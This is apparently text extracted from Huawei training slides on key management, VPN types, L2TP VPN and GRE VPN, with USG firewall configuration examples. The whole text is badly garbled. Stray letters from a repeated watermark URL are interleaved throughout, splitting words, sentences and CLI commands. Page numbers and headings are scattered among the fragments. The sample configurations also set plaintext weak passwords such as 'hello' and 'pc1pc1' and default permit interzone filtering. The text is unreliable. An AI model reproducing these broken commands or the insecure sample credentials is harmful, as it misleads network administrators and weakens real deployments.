Digital certificate format X.509
Issued by a trustworthy organization
Storage of the digital certificate
:
s
e
c
r
h
.
g
n
i
n XXX
Subject:
r
a
e
Public
key: 9f 0a 34 ...
l
/
/
p:
t
t
h
ou
n
r
a
e
r
o
g
n
i
s
e
R
Validity: 5/5/2008-5/5/2009
Serial Number: 123465
Issuer: CA
Signature: CA digital signature
Path to the certificate: a trusted
link
Le
Pa ge 29
n
e
/
m
o
c
Cryptography
.
i
e
w
a
u
h
.
g
n
i
n
r
a
le
/
/
p
t
technologies
ht
:
s
e
c
1.3 Key management rtechnologies
u
o
s
e
R
g
n
i
n
r
a
Le
r
Copyrig
o
Pa ge 31
n
e
/
m
o
c
Key Management Technologies
w
a
u
h
.
g
Key management technologies
Generation of keys
Assignment and storage
e
r
o
.
i
e
n
i
n
r
a
le
/
/
Replacement and destruction p:
t
t
h
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
Pa ge 32
n
e
/
m
o
c
Key Management System
.
i
e
w
a
u
A complete key management system should ensure

.h that:
The key is difficult to steal or copy.
g
n
ni
r
a
e
The stolen key is useless, because it is
limited
by the use scope
l
/
/
:
and time.
p
t
t
h
Assignment and replacement of keys is transparent to users.
:
s
Core keys must be keptce
separately by the respective owners.
r
u
o
s
e
R
g
n
i
n
r
a
Le
r
Pa ge 34
Copyrig
o
Key Management Strategy
n
e
/
.
i
e
m
o
c
w
a
uthe following
A complete key management policy should meet
h
.
g
n
requirements:
i
n
r
a users to reuse an old
The password control policy allows or forbids
e
l
/
password (compulsory password history),
and determines the duration
/
: password lifetime and
p
between two password changes (maximum
t
t
minimum password lifetime), thehminimum password length, and
:
s
combination of case-sensitive
e letters, numbers, and special characters
c
r
(password complexity requirements).
u
o
s
The account lockout
Re policy determines how many login failures the
gbefore it locks an account within a specific time period.
system accepts
n
i
n
r
Legal requirements
and service contract
a
e
L
r
Pa ge 35
Copyrig
o
n
e
/
m
o
c
Contents
.
i
e
w
a
u
1. VPN Introduction
h
.
g
n
i
n
2. VPN Technologies
r
a
le
3. VPN Types
/
/
p:
:
s
e
c
r
t
t
h
u
o
s
n
r
a
e
r
o
g
n
i
Re
Le
Pa ge 37
n
e
/
Service-based VPN Classification om

c
.
i
(1)
e
w
a
u
h
VPN management system
.
g
n
i
n
r
a
le
/
/
p:
Mobile office
employee
Access VPN
:
s
e
c
r
Re
u
o
s
t
t
h
Enterprises
data center
Headquarters
VPDN gateway
g
n
i enterprise need to work from a distance during business
Employees of n
an
r
a
trips, or the
enterprise
needs to provide B2C secure access service.
e
L
r
Pa ge 38
Copyrig
o
n
e
/

c
.
i
(2)
e
w
a
u
h
VPN management
system
.
g
n
i
n
r
a
le
Large/medium-sized
branch
/
/
p:
Gateway to gateway
:
s
e
c
r
Small/medium-sized
branch
Gateway to gateway
Intranet VPN in
t
t
h
Enterprise
s data
center
Headquarters
u
o
s
Re
n
r
a branches of an enterprise
Interconnecting
e
L
r
Copyrig
o
Pa ge 39
n
e
/

c
.
i
(3)
e
w
a
u
h
VPN management system
.
g
n
i
n
r
a
le
Customer
/
/
p:
:
s
e
c
r
Supplier
t
t
h
Enterprise
s data
center
Headquarters
u
o
s
g
n
i
Extranet VPN
n
r
a
Re
Providing Business to Business (B2B) secure access
e
r
o
Le
Pa ge 40
m
o
Layer-based VPN Classification i.c
e
w
a
u
h
.
g
n
GRE
i IPSec
n
Layer-3 VPN:
r
a
e
l
/
/
:
Network layer
p
t
t
h
:
s
e
c
L2F
PPTP
L2TP
Layer-2 VPN:
r
u
o
s
e
R Data link layer
g
n
i
n
r
a
Le
r
Pa ge 41
Copyrig
o
n
e
/
n
e
/
m
o
c
Summary
.
i
e
w
a
u
h
.
g
VPN concepts
Key VPN technologies
Types and applications of VPNs
n
i
n
r
a
le
/
/
p:
:
s
e
c
r
t
t
h
u
o
s
n
r
a
e
r
o
g
n
i
Re
Le
Pa ge 42
n
e
/
m
o
c
Questions
.
i
e
aw
What are the features of symmetric encryption and uasymmetric
h
.
g
encryption respectively?
n
i
n
What is the difference between the encryption

r algorithm and
a
e
l
/
/
p:
Does a longer key strengthen thetencryption
performance? Can
t
h
we analyze it based on different encryption algorithms?
:
s
etunneling in the VPN technology?
c
What are the functions of
r
u
o protocol, while GRE and IPSec are L3VPN
s
Why is L2TP a L2VPN
Re
protocols?
g
n
i
n
r
a
Le
r
Pa ge 43
Copyrig
o
Hash algorithm?
n
e
/
m
o
c
Answer
.
i
e
w
a
u
h
.
g
n
i
n
r
a
le
/
/
p:
:
s
e
c
r
t
t
h
u
o
s
n
r
a
e
r
o
g
n
i
Re
Le
Pa ge 44
n
e
/
m
o
c
.
i
e
w
a
u
h
.
g
n
i
n
r
a
le
Thank :you
//
p
www.huawei.com
t
t
:
s
e
c
r
u
o
s
n
r
a
e
r
o
Le
g
n
i
Re
n
e
/
m
o
c
.
i
e
w
a
u
h
.
g
n
i
n
Chapter 7 L2TP VPN lear

/
/
p:
:
s
e
c
r
t
t
h
u
o
s
n
r
a
g
n
i
Re
e
L
e
r
o
www.huawei.com
Objectives
n
e
/
.
i
e
m
o
c
w
a
u to:
able
.
g
n
Application scenarios of VPDN
i
n
r
a
Basic concepts of L2TP
e
l
/
/ Client-Initialized and NAS:
in
p
t
Initialized modes
ht
:
s
Configuration methods
e of L2TP
c
r
u
o
s
Re
g
n
i
n
r
a
Le
r
Pa ge 1
Copyrig
o
n
e
/
m
o
c
Contents
.
i
e
w
a
u
1. VPDN Overview
h
.
g
n
i
n
2. L2TP VPN Technology
r
a
le
3. Client-Initialized L2TP
4. NAS-Initialized L2TP
:
s
e
c
r
/
/
p:
t
t
h
u
o
s
n
r
a
e
r
o
g
n
i
Re
Le
Pa ge 2
VPDN Overview
.
i
e
m
o
c
w
a
The client is directly connected to the enterprise gateway
u through the
Network
h
. (L2F) and Layer
device and
Point-to-Point Protocol (PPP). Currently, Layer 2 Forwarding
g
n
VPDN gateway
2 Tunneling Protocol are available.
i
n
r
a
e
l and then the gateway through
The client is connected to the Internet
/
Client and
/ the L2TP client supported by
VPDN
certain dedicated software, for example,
:
p
gateway
t
Windows 2000.
ht
:refers to a virtual private network that is
Virtual Private Dial Network (VPDN)
s
efunction of a public network, such as Integrated
c
implemented through the dialing
r or Public Switched Telephone Network (PSTN) and
u
Services Digital Network (ISDN)
oprovide access for enterprises, small Internet service
s
access network. VPDN can
Re office users.
providers (ISPs), and mobile
g of VPDN tunneling protocols, namely, Point-to-Point Tunneling
There are three types
n
iL2F, and Layer 2 Tunneling Protocol (L2TP). Currently, L2TP is widely
n
Protocol (PPTP),
r
a
used.
Le
r
Pa ge 3
Copyrig
o
n
e
/
n
e
/
m
o
c
Contents
.
i
e
w
a
u
1. VPDN Overview
h
.
g
n
i
n
r
a
le
:
s
e
c
r
/
/
p:
t
t
h
u
o
s
n
r
a
e
r
o
g
n
i
Re
Le
Pa ge 5
n
e
/
m
o
c
L2TP Overview
.
i
e
L2TP is short for Layer Two Tunneling Protocol.
w
a
u
h
.
g
n
i
n
It is developed for the transparent transmission of PPP packets between
r
a
le
users and enterprise servers. It provides a tunnel for transmitting PPP

packets at the data link layer.
/
/
p:
t
t
h
industrial standard for Layer-2: protocols of IETF.
s
e
c and employees on business trips of an
Main usage: Remote branches
r
u
o
enterprise can access the
s headquarters network through the virtual
e
R
tunnel established gon the public network.
n
i
n
r
a
e
L
r
Pa ge 6
Copyrig
o
It combines the advantages of L2F and PPTP. Therefore, it becomes the
n
e
/
m
o
c
Features of L2TP
.
i
e
w
a
u
High
reliability
Identity
authenticati
on
h
.
g
r
a
Multile
/ protocol
/
p: transmission
t
t
L2TP
h
s:
Flexible ce
r
u
accounting
o
n
r
a
e
r
o
g
n
i
s
e
R
n
i
n
Internal
address
assignment
RADIUS
support
Le
Pa ge 7
n
e
/
m
o
c
L2TP VPN Protocol Components
.
i
e
w
a
u
r
a
le
PSTN/ADSL
Session
Tunnel
LAC
:
s
e
c
r
LNS RADIUS
/
/
p:
LAC RADIUS
Employee on
business trip
n
i
n
Data message
Control message
L2TP
message
h
.
g
t
t
h
u
o
s
LNS
Re
g
n
i Concentrator
LAC: L2TP Access
n
r
a
LNS: L2TP
Network
Server
e
L
r
Copyrig
o
Pa ge 9
Headquarters
n
e
/
m
o
L2TP Protocol Stack and Encapsulation Process
c
.
i
e
w
a
Structure of the L2TP Protocol Stack
u
h
.
Private
Public
g
UDP L2TP PPP
n Data
IP header
IP header
i
n
r
a
L2TP Encapsulation Process
e
l
/
/Private IP
:
Private IP
p
t
PPP
ht PPP
L2TP
L2TP
:
s
Link
e
UDP c
UDP
layer
r
u
Physical Public
Private IP
Public IP
Private IP
o IP
s
layer
e layer
PPP
Link layer
Link layer
RLink
g Physical
Physical
Physical Physical
Physical
n
layer
layer
layer
layer
layer
i
n
r LAC
Server
Client ea
LNS
L
r
Pa ge 10
Copyrig
o
n
e
/
m
o
c
L2TP Messages and Formats
.
i
e
w
a
u
h
.
g
Applies to the establishment, maintenance, and

transmission control of tunnel and session connections.
Control
message
n
i
n
r
a
le
Encapsulates PPP frames and transmits them along

the tunnel.
Data message
0 1 2 3 4
/
/
p:
12
:
s
e
c
r
T L X X S X O P X X X X
Tunnel ID
Ns
t
t
15
h
Version
u
o
s
Re
Offset size
n
r
a
g
n
i
31
length
Session ID
Nr
Offset pad
T indicates the message type. 1: control message; 0: data message.
e
r
o
Le
Pa ge 12
n
e
/
m
o
c
L2TP Session Establishment Process
.
i
e
w
a
u
h
.
g
n
i
n
r
a
e
l
/
/
:
p
t
ht
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
r
Pa ge 13
Copyrig
o
n
e
/
m
o
c
Contents
.
i
e
w
a
u
1. VPDN Overview
h
.
g
n
i
n
r
a
le
:
s
e
c
r
/
/
p:
t
t
h
u
o
s
n
r
a
e
r
o
g
n
i
Re
Le
Pa ge 14
n
e
/
L2TP VPN Initiated by a Remote Dial-Up
m
o
c
.
User
i
e
w
a
u
h
.
g
L2TP tunnel
n
i
LNS
n
r
a
Remote
e
l
user
/
/
:
p
t
Remote
t
h
branch
:
s
eemployee L2TP tunnel
c
Mobile office
r
Headquart
u
o
ers server
s
e
R
VPN acts as a trunk; LNS acts as a checkpoint.
g
n
LNS: You can
i pass through.
n
rOK. I send the goods by myself.
a
VPN user:
Le
r
Pa ge 15
Copyrig
o
n
e
/
Typical Configuration of L2TP VPN om

c
.
i
Client-LNS
e
w
a
u
h
.
E1/0/1
g
n
3.3.2.1/16 i
n
r
a
Headquarters
Internet
e
l
/
E1/0/0
/
:
p
192.168.1.1
t
LNS
/24
Mobile office employee
ht
:
s
Networking requirements ce
r
An enterprise sets up a uVPN network. There is a VPN gateway (that is, USG
o
firewall) at the egresssof the public network of the headquarters. Mobile office
e
employees need to Rcommunicate with the service server in the enterprise through
the L2TP tunnel.g
n
i
The LNS uses
n local authentication. Here:
r
LNSea
is a USG firewall.
L
e
r
o
Pa ge 16
L2TP Configuration Client
n
e
/
m
o
c
.
i
e
w
a
u
h
.
g
Start
n
i
n
r
a
le
Enable tunnel authentication.

Configure the IP address
of the LNS server.
Disable IPSec.
u
o
s
:
s
e
c
r
/
/
p:
t
t
h
e
R
Configure the
g mode.
authentication
n
i
n
r
a
Le
r
Copyrig
o
Configure the user

name and password.
End
Pa ge 17
n
e
/
m
o
c
L2TP Configuration LNS
.
i
e
w
a
u
h
.
g
Start
n
i
n
Configure L2TP group of

the LNS end.
r
a
le
Perform basic configuration

(including interface IP
address).
Configure virtual
interface template.
n
r
a
g
n
i
/
/
p: In the AAA view, configure the user
:
s
e
c
r
t
t
h
u
o
s
name of the VPDN group.
Enable the interzone filtering

rule.
Re
End
Enable L2TP.
e
r
o
Le
Pa ge 18
n
e
/
Typical Configuration of L2TP VPN om

c
.
i
LNS (1)
e
w
a
u
Create a virtual interface template.
h
.
g
n
[LNS] interface Virtual-Template 1
i
n
r
a template.
Set the IP address of the virtual interface
e
l
/
/ 24
[LNS-Virtual-Template1] ip address 10.1.1.1
:
p
t
Configure the PPP authentication
mode.
ht
:
s
[LNS-Virtual-Template1] ppp authentication-mode
chap
e
c
r
u from the address pool to the peer
Assign an IP address
o
s
e
R
interface.
g
n
i
[LNS-Virtual-Template1]
remote address pool 1
n
r
a
Le
e
r
o
Pa ge 19
n
e
m/
Typical Configuration of L2TP VPN oLNS
c
.
i
(2)
e
w
a
Add the virtual interface template to a security zone. u
h
.
[LNS-zone-trust] add interface Virtual-Template 1
g
n
i
Enable L2TP.
n
r
a
[LNS] l2tp enable
e
l
/
Configure an L2TP group.
/
:
p
[LNS] l2tp-group 1
t
t
h
Specify the name and Virtual-Template
of the tunnel peer when
:
s
receiving a call.
e
c
r
[LNS-l2tp1] allow l2tp virtual-template
1 remote Client01
u
o
s
Enable L2TP tunnel
Re authentication.
[LNS-l2tp1] tunnel
g authentication
n
i tunnel authentication password.
n
Set an L2TP
r
a
[LNS-l2tp1]
Le tunnel password simple hello
r
Pa ge 20
Copyrig
o
n
e
m/
Typical Configuration of L2TP VPN oLNS
c
.
i
(3)
e
w
a
Configure the tunnel name of the local end.
u
h
.
[LNS-l2tp1] tunnel name lns
g
n
i
Enter the AAA view.
n
r
a
[LNS] aaa
e
l
/
Create the name and password of the local
/ user.
:
p
[LNS-aaa] local-user pc1 password simple pc1pc1
t
t
h
Configure the user type.
:
s
e ppp
[LNS-aaa] local-user pc1 service-type
c
r pool.
u
Configure a public IP address
o
s
[LNS-aaa] ip pool 1 4.1.1.1
Re 4.1.1.99
g interzone packet-filtering rules.
Configure default
n
i
n
[LNS] firewallrpacket-filter default permit interzone local untrust
a
e
L
r
Pa ge 21
Copyrig
o
n
e
/
m
o
c
Contents
.
i
e
w
a
u
1. VPDN Overview
h
.
g
n
i
n
r
a
le
:
s
e
c
r
/
/
p:
t
t
h
u
o
s
n
r
a
e
r
o
g
n
i
Re
Le
Pa ge 22
n
e
/
m
o
c
L2TP VPN NAS Initiated
.
i
e
w
a
u
PPP
L2TP tunnel
Remote
user
Branch
PPPOE
n
i
n
r
a
le
PSTN
Ethernet
h
.
g
LAC
LNS
/
/
p:
t
t
h
:
s
e
c
Mobile
r office
u
employee
o
s
L2TP tunnel
e
R
VPN user acts asg a trunk; LAC acts as a forwarder.
n
i
LAC: Your goods
n can pass through. May I help you?
r
aDeliver the goods to No. XX of XX Street.
VPN user:
e
L
r
Pa ge 23
Copyrig
o
Headquarter
s server
n
e
/
m
Typical Configuration of L2TP
o
c
.
i
VPN LAC-LNS
e
w
E0/0/0
1.1.1.1/24
E0/0/1
E1/0/1
2.2.1.1/16
3.3.2.1/16
Internet
Branch
Networking requirements:
r
a
le
/
/
p:
LAC
:
s
e
c
r
.
g
n
i
n
t
t
h
a
u
h
Headquarters
E1/0/0
LNS
3.1.1.1/24
A company sets up a VPN network. There is a VPN gateway (that is, USG firewall)
at the egress of the public network of the headquarters. Mobile office employees
need to communicate with the service server in the enterprise through the L2TP
tunnel
u
o
s
e
R
LNS uses local authentication.
Here:
g
n
LAC acts i
as a USG firewall.
n
r
LNS a
acts as a USG firewall.
e
L
r
Copyrig
o
Pa ge 24
n
e
/
m
o
c
L2TP Configuration LAC

w
a
u
h
.
g
Start
n
i
n

(including interface IP address).
Configure virtual interface

template and bind to the
physical interface.
:
s
e
c
r
r
a
le
/
/
p:
t
t
h
u
o
s
g
n
i
.
i
e
Re
Configure the L2TP group

of the LNS end.
In the AAA view, configure
the user name of the
VPDN group.
Enable the interzone
filtering rule.
Enable L2TP.
n
r
a
e
r
o
End
Le
Pa ge 25
n
e
/
m
o
c
L2TP Configuration LNS
.
i
e
w
a
u
h
.
g
Start
n
i
nConfigure the L2TP
r
a
le

address).
Configure the virtual

interface template.
n
r
a
g
n
i
/
/
p:
:
s
e
c
r
t
t
h
u
o
s
group of the LNS.
In the AAA view, configure the

accounts of the VPDN group.
Enable the interzone filtering

rule.
Re
End
Enable L2TP.
e
r
o
Le
Pa ge 26
n
e
/
m
o (1)
Typical Configurations of L2TP VPN .cLAC
i
e
w
a
u
Create a virtual template interface.
h
.
g
[LAC] interface Virtual-Template 1
n
i
n
Configure the PPP authentication mode.
r
a
e
l
[LAC-Virtual-Template1] ppp authentication-mode
chap
/
/ template.
:
Bind the interface to the virtual interface
p
t
[LAC]interface ethernet 0/0/0 ht
: bind virtual-template 1
[LAC-Ethernet0/0/0] pppoe-server
s
e
c
Add the virtual interfacertemplate to the security zone.
u
o
s
[LAC]firewall zoneetrust
Radd interface Virtual-Template 1
[LAC-zone-trust]
g
n
i add interface ethernet 0/0/0
[LAC-zone-trust]
n
r
a
Le
r
Pa ge 27
Copyrig
o
n
e
/
m
o (2)
i
e
w
a
u
Enable L2TP.
h
.
g
[LAC] l2tp enable
n
i
n
Create an L2TP group.
r
a
e
l
[LAC] l2tp-group 1
/
/
:
Set a peer IP address for the L2TP tunnel.
p
t
[LAC-l2tp1] start l2tp ip 3.3.2.1
htfullusername pc1 (domain hs.com)
:
Start L2TP tunnel authentication.
s
e
c
r
[LAC-l2tp1] tunnel authentication
u
o
s
Configure an authentication
password for the L2TP tunnel.
e
R password simple hello
[LAC-l2tp1] tunnel
g
n
i
n
r
a
Le
r
Pa ge 28
Copyrig
o
n
e
/
m
o (3)
i
e
w
a
Configure the name of the local end of the tunnel.u
h
.
LAC-l2tp1] tunnel name lac
g
n
i
Enter AAA view.
n
r
a
e
[LAC] aaa
l
/ the local user.
/
Configure the name and password
for
:
p
t simple pc1pc1
[LAC-aaa] local-user pc1 password
t
h
Configure the default interzone
: packet filtering policy.
s
e default permit interzone trust local
c
[LAC] firewall packet-filter
r
u
o
[LAC] firewall packet-filter
default permit interzone untrust
s
e
local
R
g
n
i
n
r
a
Le
r
Pa ge 29
Copyrig
o
n
e
/
m
o (1)
Typical Configurations of L2TP VPN .cLNS
i
e
w
a
Create a virtual interface template.
u
h
.
[LNS] interface Virtual-Template 1
g
n
i
Configure the IP address of the virtual interface
n template.
r
a 24
e
[LNS-Virtual-Template1] ip address 10.1.1.1
l
/
/
Configure the PPP authentication :
mode.
p
t
[LNS-Virtual-Template1] ppp tauthentication-mode chap
h
Allocate an IP address from
: the address pool to the peer
s
e
interface.
c
r
u
[LNS-Virtual-Template1]
remote address pool 1
o
s
Re
g
n
i
n
r
a
Le
r
Pa ge 30
Copyrig
o
n
e
/
m
o (2)
i
e
Add the virtual interface template to the security zone. w
a
u
[LNS-zone-trust] add interface Virtual-Template 1 .h
g
n
Enable L2TP
i
n
r
[LNS] l2tp enable
a
e
l
Configure an L2TP group.
/
/
:
[LNS] l2tp-group 1
p
t
t
h
Specify the name and Virtual-Template
of the tunnel peer when
:
receiving a call.
s
e
c
[LNS-l2tp1] allow l2tp virtual-template
1
r
u
o
s
Start L2TP tunnel authentication.
e
R
[LNS-l2tp1] tunnel
authentication
g
n
i
Configure annL2TP tunnel authentication password.
r
a
[LNS-l2tp1]
Le tunnel password simple hello
r
Pa ge 31
Copyrig
o
n
e
/
m
o (3)
i
e
w
Configure the name of the local end of the tunnel.
a
u
h
[LNS-l2tp1] tunnel name lns
.
g
n
Enter the AAA view.
i
n
r
a
[LNS] aaa
e
l
/
Create the user name and password of the local user.
/
:
p simple pc1pc1
[LNS-aaa] local-user pc1 password
t
t
h
Configure the user type.
:
s
e
[LNS-aaa] local-user pc1cservice-type
ppp
r
u
Configure a public IP address
pool.
o
s
e
[LNS-aaa] ip pool
R 1 4.1.1.1 4.1.1.99
g interzone packet filtering rules.
Configure default
n
i
n
[LNS] firewall
r packet-filter default permit interzone local untrust
a
Le
r
Pa ge 32
Copyrig
o
L2TP VPN Configuration (Web)
n
e
/
w
a
u
.
i
e
h
.
g
n
i
n
r
a
le
/
/
p:
:
s
e
c
r
t
t
h
u
o
s
n
r
a
e
r
o
g
n
i
Re
Le
Pa ge 33
m
o
c
n
e
/
m
Typical Configurations of L2TP VPN
o
c
.
Verification and Maintenance
ei
Display information about the current L2TP tunnel.
w
a
u
h
.
g
n
i
n
<LAC> display l2tp tunnel
r
a
l1e
LocalTID RemoteTID Remote Address Port Sessions Remote Name

1
3.3.2.1
/
/
p:
1701
t
t
h L2TP session.
Display information about the current
:
s
<LAC> display l2tp session ce
r
u
LocalSID
RemoteSID
LocalTID
o
s
e
R
1
8
1
g
n
Total session i= 1
n
r
a
e
L
r
Pa ge 34
Copyrig
o
Total tunnels = 1
lns
m
o
c
Precautions on L2TP VPN Configuration
.
i
e
w
a
u
The LNS must be configured with the IP address of theh
.
virtual template. This template must be added to a g
zone.
n
i
n
r
a
By default, the firewall needs to carry out e
tunnel
l
authentication. If tunnel authentication/is not configured,
/
run the undo tunnel authentication :
command.
p
t
ht dial-up user and the
The address allocated to the L2TP
: user must be on different
address of the internal network
s
e the dial-up user of L2TP can
network segments so that
c
r address.
access internal network
u
o
s
e
R
The USG5000 cannot be configured as the LAC.
g
n
i
n
r
a
Le
r
Pa ge 35
Copyrig
o
n
e
/
n
e
/
m
o
c
Summary
.
i
e
w
a
u
h
.
g

Basic concepts of L2TP
n
i
n
r
a
e
Application scenarios of VPDN inlClient-Initialized

and
/
/
:
NAS-Initialized modes
p
t
t
h
Configuration methods:of L2TP

s
e
c
r
u
o
s
e
R
g
n
i
n
r
a
Le
r
Pa ge 37
Copyrig
o
Questions
n
e
/
.
i
e
m
o
c
w
a
What are the two trigger conditions for the LAC to establish an L2TP tunneluconnection? What are
h
.
the differences between them?
g
n
What information does LNS use to identify L2TP packets?
i
n
r in data packets?
What are the differences between the LAC/client and the LNS/server
a
e Client-Initialized L2TP?
l
In what situation should tunnel authentication be disabled
for
/
/
: physical interface Ethernet 0/0/0
Why an LAC virtual interface template and its corresponding
p
t
need not be configured with IP addresses?
t
h number 1 (default group)? What are the
What is the application scenario of L2TP group
:
s
differences between this group number
e and other group numbers?
c
r DHCP IP address and the domain?
What is the relationship betweenuthe
o
To ensure that remote dial-upsusers can access resources of the private network, how do you
e
R
configure the interzone packet filtering on the LNS, and the relationship between virtual interface
gzone?
template and security
n
i
n
For L2TP, how r
do you configure the interzone packet filtering to meet the requirements for
a
minimum rights?
e
L
r
Pa ge 38
Copyrig
o
What security services can the L2TP VPN provide? What are the restrictions?
n
e
/
m
o
c
Answer
.
i
e
w
a
u
h
.
g
n
i
n
r
a
le
/
/
p:
:
s
e
c
r
t
t
h
u
o
s
n
r
a
e
r
o
g
n
i
Re
Le
Pa ge 39
n
e
/
m
o
c
.
i
e
w
a
u
h
.
g
n
i
n
r
a
le
Thank :you
//
p
www.huawei.com
t
t
:
s
e
c
r
u
o
s
n
r
a
e
r
o
Le
g
n
i
Re
n
e
/
m
o
c
.
i
e
w
a
u
h
.
g
Chapter 8 GRE VPN
n
i
n
r
a
le
/
/
p:
:
s
e
c
r
t
t
h
u
o
s
n
r
a
g
n
i
Re
e
L
e
r
o
www.huawei.com
Objectives
n
e
/
.
i
e
m
o
c
w
a
u to:
able
.
g
n of Generic
Basic principles and implementation modes
i
n
r
Routing Encapsulation (GRE) VPN ea
l
/
/
Security mechanisms of GRE VPN
:
p
t
t
Application scenarios andhconfiguration
methods of GRE
:
s
VPN
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
r
Pa ge 1
Copyrig
o
n
e
/
m
o
c
Contents
.
i
e
w
a
u
1. GRE VPN Overview

2. GRE VPN Technology
n
i
n
h
.
g
r
a
e of GRE VPN
l
3. Analyzing the Application Scenarios
/
/
:
p
t
t
h
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
r
Pa ge 2
Copyrig
o
n
e
/
m
o
c
GRE Overview
Link
layer
IP
.
i
e
GRE
IPX
w
a
Payloadhu
.
g
n
i
n
r
a
e
l
GRE Tunnel
INTERNET
IPX network
Firewall A
t
t
h
/
/
p:
Firewall B
HQ
IPX network
:
s
GRE refers to encapsulation of data
e packets of certain network layers such as IP, IPX,
c
r packets can be transmitted over another
and AppleTalk, so that encapsulated
u
oexample, IP.
network layer protocol, for
s
e
R
GRE provides a mechanism in which a packet of one protocol can be encapsulated
g
n
into a packet of another
protocol so that packets can be transmitted over various
i
n
r The packet transmission path is referred to as tunnel.
types of networks.
a
Le
r
Pa ge 3
Copyrig
o
n
e
/
m
o
c
Applications of GRE
.
i
e
w
a
u
h
.
g protocol
Passenger
n
i
n
r
a
Encapsulation
protocol
e
l
/
IP/IPX
GRE
/
:
p
IP
:
s
e
c
r
Link layer protocol
t
t
h
Transport protocol
u
o
s
n
r
a
e
r
o
g
n
i
Re
Le
Pa ge 4
n
e
/
m
o
c
GRE Features
.
i
e
w
a
u
n
r
a
e
r
o
n
i
n
r
a
le
/
/
p:
Simple
mechanism,
easy to
configure and
maintain
g
n
i
h
.
g
Does not
provide data
encryption and
can be used
with IPSec.
u
o
s
:
s
e
c
r
t
t
h
Does not provide

flow control or
QoS.
Re
Le
Pa ge 5
n
e
/
m
o
c
Contents
.
i
e
w
a
u
1. GRE VPN Overview

n
i
n
h
.
g
r
a
e of GRE VPN
l
/
/
:
p
t
t
h
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
r
Pa ge 6
Copyrig
o
n
e
/
m
GRE Implementation tunnel
o
c
.
i
interface
e
w
Source address
Encapsulation
type
r
u
o
g
n
i
.
g
n
i
n
a
u
h
r
a
le Destination
/
/
Tunnel :
p
t
interface
t
h
IP:address
s
e
c
address
s
e
R
A tunnel interface is a point-to-point virtual interface that is provided to
n
r
a
encapsulate packets. It is similar to loopback interface and is a logical
Le
interface.
e
r
o
Pa ge 7
n
e
/
GRE Implementation Encapsulation om

c
.
i
and Decapsulation
e
w
a
u
h
Next hop: tunnel
. 47
Protocol field:
g
n
i
n
r
a
e
l
/
/
GRE
tunnel
:
FW A
FW B
p
Encapsulation process:
t
htentering the tunnel interface, the packet is
Routes the original data packet; after
:
encapsulated.
s
e is forwarded to the IP module for further
c
The encapsulated data packet
r
u
processing.
o
s
Decapsulation process: e
R
The destination gaddress of the packet is the IP address of the local device; the
n 47; Then, start the decapsulation.
protocol fieldiis
n
r
The encapsulated
data packet is forwarded to the IP module for further
a
processing.
Le
e
r
o
Pa ge 8
m
o
c
Format of a GRE Packet Header i.

e
w
a
n
e
/
u
h
.
g
n
ni
r
a
C: Checksum Present bit. 1: The checksum field is present.
0 : The checksum field is
e
l
/
absent.
/
:
p
K: Key Present bit. 1: The key field is present
t in the GRE header. 0: The key field is
t
h
absent.
:
s
Recursion: Contains the number of
e additional encapsulations which are permitted.
c
rbe set to 0s.
Flags: reserved bits. They must
u
o
s
Version bit. It must be set
Re to 0. The value 1 is used in PPTP of RFC2637.
Protocol Type: typegof the passenger protocol.
n
i
nheader and the checksum field born on the GRE header.
Checksum: GRE
r
ea IP checksum of the GRE header and the payload packet.
Key: key Lfield.
r
Pa ge 10
Copyrig
o
n
e
/
m
o
c
GRE Security Mechanism
.
i
e
w
a
u
Keyword
in Identification
Check and Verification
n
r
a
e
l
/
/
p:
When bit C is 1, the

checksum is valid.
:
s
e
c
r
Bit C being 1
Sender calculates the
ou
t
t
h
If bit K is 1, the key field

is present in the GRE
header.
s
e
Receiver verifies the
R
g
checksum.
n
i
n
r
a
Le
r
Copyrig
o
checksum.
h
.
g
Only when the keyword is

consistent, the check
succeeds.
Pa ge 11
n
e
/
m
o
c
Contents
.
i
e
w
a
u
1. GRE VPN Overview

n
i
n
h
.
g
r
a
e of GRE VPN
l
/
/
:
p
t
t
h
:
s
e
c
r
u
o
s
Re
g
n
i
n
r
a
Le
r
Pa ge 12
Copyrig
o
n
e
/
m
Typical Application Scenario of GRE
o
c
.
i
VPN
e
w
a
u
h
.
g
E1/0/0
E2/0/0
n
i
192.13.2.1/24
n
131.108.5.2/24
r
a
E0/0/0
e
l
10.1.1.1/24
/
Internet
/
HQ
:
E0/0/0
p
t
10.1.3.1/24
t
h
:
s
e tunnel
GRE
c
Firewall A r
Firewall B
u
o
s
Re
Subnets 1 andng2 are interconnected through Layer 3 tunnel
i
n
r
protocol abetween
firewalls A and B.
Le
r
Pa ge 13
Copyrig
o
n
e
/
m
o
c
Configuration Roadmap of GRE VPN
.
i
e
w
a
u
h
.
Start
g
n
i
nConfigure a route to the
r
asegment on the peer network.
e
l The next hop is the tunnel
/
/
interface.
:
p
address).
t
ht
Enable interzone rules.
:
s
e
c
r
u
o
s
End
Configure a tunnel logicaleinterface
R
and specify the source address and
gused by the
destination address
n
i
GREntunnel.
r
a
Le
r
Pa ge 14
Copyrig
o
n
e
/
m
o
Configuration Method of GRE VPNi.c
e
Run the interface tunnel number command to create a virtual tunnel w
interface and
a
u
enter the interface view.
h
.
gthe encapsulation
(Optional) Run the tunnel-protocol gre command to configure
n
i
mode of the tunnel interface packet.
n
r
a
Run the source { ip-address | interface-type interface-number
} command to configure
e
l
/
the source address of the Tunnel interface.
/
:
Run the destination ip-address command topconfigure the destination address of the
t
t
Tunnel interface.
h
: of the tunnel identify a tunnel. The
The source and destination addresses
s
e
addresses of the two ends c
are source and destination addresses to each other.
r
u
o ip-address { mask | mask-length } command to
(Optional) Run the ip address
s
e
configure the networkRaddress
of the tunnel interface. Run the gre checksum
g end-to-end check for both ends of the tunnel.
command to configure
n
i
(Optional) Runnthe gre key key-number command to configure identification keys for
r
a
the Tunnele interface.
L
r
Pa ge 15
Copyrig
o
n
e
/
m
o
c (1)
Typical Configuration of GRE VPN
.
i
e
w
Configure firewall A.
a
u
h
1.Perform basic configuration (omitted).
.
g
n
2.Create interface Tunnel 1.
i
n
r
[A] interface tunnel 1
a
e
3.Configure the IP address of interface Tunnel 1. l
/
/
[A-Tunnel1] ip address 10.1.1.1 24
:
p
t
4.Configure the tunnel encapsulation mode.
t
h
[A-Tunnel1] tunnel-protocol gre
:
s
